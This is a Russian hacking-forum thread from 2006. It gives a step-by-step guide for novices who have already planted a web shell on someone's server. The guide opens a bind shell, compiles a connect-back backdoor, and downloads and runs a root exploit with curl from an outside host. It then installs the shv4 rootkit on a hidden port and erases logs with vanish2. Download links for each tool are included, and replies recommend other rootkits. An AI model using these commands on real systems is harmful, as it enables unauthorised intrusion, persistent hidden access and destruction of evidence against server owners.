Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   R00t me №1 (https://forum.antichat.xyz/showthread.php?t=17581)

Desr0w 12.04.2006 19:36

R00t me №1
 
Решил написать статейку для расширения кругозора новичков античата в целом.
Думаю, она многим понадобится и даст маленький толчок в дальнейшем развитии.
Статья предназначена для тех, кто уже умеет заливать веб-шелл и ознакомлен со всеми его прелестями...
Итак – мы залили шелл. Что же делать дальше?

Отдаём первую команду:
Код:

uname –a
Что же мы видим?
Linux nalog.com 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
Ядро старо,как мир.Нашей задачей будет поднять свои привилегии до максимальных aka root.Описание взлома всех версий линуксов,фрях,ect описать не реально-так что в этой статье будем говорить исключительно о Linux 2.4.20-8.
Погнали)
Для начала проделаем следующие шаги:
1)
Код:

cd /tmp
 mkdir logs
 cd logs

2)Cливаем: bind.pl
Код:

chmod +x bind.pl
perl bind.pl

Запускаем: netcat
Код:

nc sitename 32767
Где sitename -ваш сайт.
При открытии окна командуем: id.Работает?
Отлично)
Но межет и не работать если фаер фильтрует соединение(
Тогда скачиваем
Connect-Back Backdoor (bd.c)
Код:

chmod +x bd.c
gcc db.c –o bd

После чего ставим netcat на прослушку 4000-ого порта:
Код:

-l –p 4000
И запускаем бекдор:
Код:

./db 127.0.0.1

Где 127.0.0.1 ваш реальный ip.
И вот в окошке появилась надпись - Connected to CommandLine...
Приступим к решительным действиям:
Скачиваем сплойт для этой версии ядра-вполне должен подойти
mremap_pte,но я советую воспользоваться xpl_brk ,т.к он меня редко подводил.
Скачиваем уже cкомпилированный сплойт:
Код:

curl  http://xpl.netmisphere2.com/xpl_brk
chmod +x  xpl_brk
./ xpl_brk
id
uid=0(root) gid=0(root)

Отлично.Мы добись того чего хотели,но это только пол дела.
http://img286.imageshack.us/img286/4...62020245gg.png
Надо закрепиться в системе для этого скачиваем руткит-возьмём shv4
Код:

curl http://splo1t.narod.ru/rootkits/shv4.tar.gz
tar xzf shv4.tar.gz
cd shv4
chmod +x setup
./setup pass  4321

*где pass(пароль) и 4321(порт) ваши значения. Во избежание проблем не советую вешать на высокий порт.
Заходит в putty указываем сайт, порт и конектимся.
Имя root,а пароль тот что вы указали при настройке. В моём случае это pass.
Зашли?

Выполняем команду:
Код:

nestat -an
Как видите заданный порт не где не светится,а значит мы освободили себя от зоркого глаза админа:)
Осталось, почистить логи.
Скачиваем один из лучших клинеров под *nix
-vanish2
Код:

chmod +x vanish2.
Собираем
Код:

gcc vanish2.c –o vanish
Запускаем:
Код:

./vanish root name_site 127.0.0.1
*Где 127.0.0.1 ваш реальный ip.
Видим надпись:
V_A_N_I_S_H_E_D_! Которая не может не радовать глаз.
_ _ _ _ _ _ _ _ _ _ _ _ _ _
На этом моя статейка кончается-надеюсь она поможет новичкам...
Ссылки:
r57Shell: http://hcr.3dn.ru/expl/php/r57shell.txt
Netcat:http://pro-hack.ru/download/s_nettools_2.html
bind.pl: http://nsd.ru/soft/1/ano/bind.pl.txt
Connect-Back Backdoor: http://desrow.narod.ru/www/bd.rar
xpl_brk: http://desrow.narod.ru/exploits/xpl_brk.rar
shv4: http://desrow.narod.ru/rootkits/shv4_.rar
Putty: http://pro-hack.ru/download/s_nettools_4.html
vanish2: http://nsd.ru/soft/1/anonimus/vanish2.tgz
For any link pass:antichat
=====[ Desr0w | | 12.04.2006 ]=====

Mobile 12.04.2006 19:43

Молодец, хорошая статья.

vectorg 12.04.2006 19:58

ну так, опять ничего особенного :)
для новичков пойдёт, но надо было бы расписать значение набранных команд...
+ всё же поставлю...

limpompo 12.04.2006 20:00

Как раз для новичков =) Нормуль!

+toxa+ 12.04.2006 20:37

Хорошая статья.... кста, в Nfm уже сразу сплойты есть.... скачиваются сразу скомпиленными.....

evil_packman 12.04.2006 20:51

хмм статья конечно для новечков ничего, тока вот shv4 или 5 ставить не советую, так как он палит порт и легго пропаливается нмапом при сканировании.
советую лучше suckit http://packetstormsecurity.org/UNIX/...sk-1.3a.tar.gz
тока собирается он не всегда.
или adore если есть шелл доступ http://www.eviltime.com/download_id.php?id=147

или смотрим руткиты на этой паге http://www.eviltime.com/download.php...bpage=rootkits

+toxa+ 12.04.2006 20:58

А почему бы не сразу СЮДА?))

Desr0w 12.04.2006 21:04

Цитата:

Сообщение от VectorG
ну так, опять ничего особенного :)
для новичков пойдёт, но надо было бы расписать значение набранных команд...
+ всё же поставлю...

Ну я ж сказал для тех кто умеет юзать хотя бы веб-шелл.По идеи они должны знать эти команды.
Ну мне не сложно:
pwd
Эта команда выводит на экран полный путь к текущему каталогу.
В любой момент можно узнать где вы находитесь.


ls

Команда ls выводит список файлов и подкаталога.
По умолчанию файлы начинающиеся с точки (.) скрываются.
Чтобы их увидеть надо добавить ключ -a:
ls -a
Для полной инфы от папках и файлах и ссылках:
ls -al
Хотим просмотреть файлы в других дирах:
Код:

ls -al /tmp

cd
команда позволяет сменить текщий каталог:
Код:

cd /tmp/bbb
и вы уже в папке bbb
например в каталоге bbb есть подкаталог bb-перейдём в него.
Код:

cd bb
Если нужно переместится на каталог выше:
Код:

cd ..
mkdir
Создание директории.
Например:
Код:

mkdir antichat
rm
Удаление файлов.
Для удаления директорий нужны след. ключи:
-d -- удалить директорию.
-r -- удалять содержимое директорий.
-f --не спрашивать подтверждение на удаление.
Код:

rm -rf /tmp/bbb/antichat
- так мы удалим дирикторию antichat.

tar
В никсах нет винрара:)
Архивы поставляются в виде tar.gz
Разархивируем:
Код:

tar xzvf namefile.tar.gz
which
Команда предназначена для того,чтобы узнать каталог в котором находится программа.
Мы например узнаём какая качалка стоит на серве.
Пример:
Код:

which ls 
/usr/bin/ls

Ну вот вроде все команды использованные в статье.
А..И еще немного о качалках:
Самая распространенная -wget
есть еще:
curl
fetch

lynx
links
GET


зы:
uname -a
показывает версию системы и еще кое что.

id -показывает ваши права.

hostname

показывает имя сайта.
есть ключ -i
Код:

hostname -i
покажет ip данного сайта.
The end.

Desr0w 12.04.2006 21:34

Описание руткитов:тут

KEZ 12.04.2006 23:11

неплохо молодец


Время: 00:17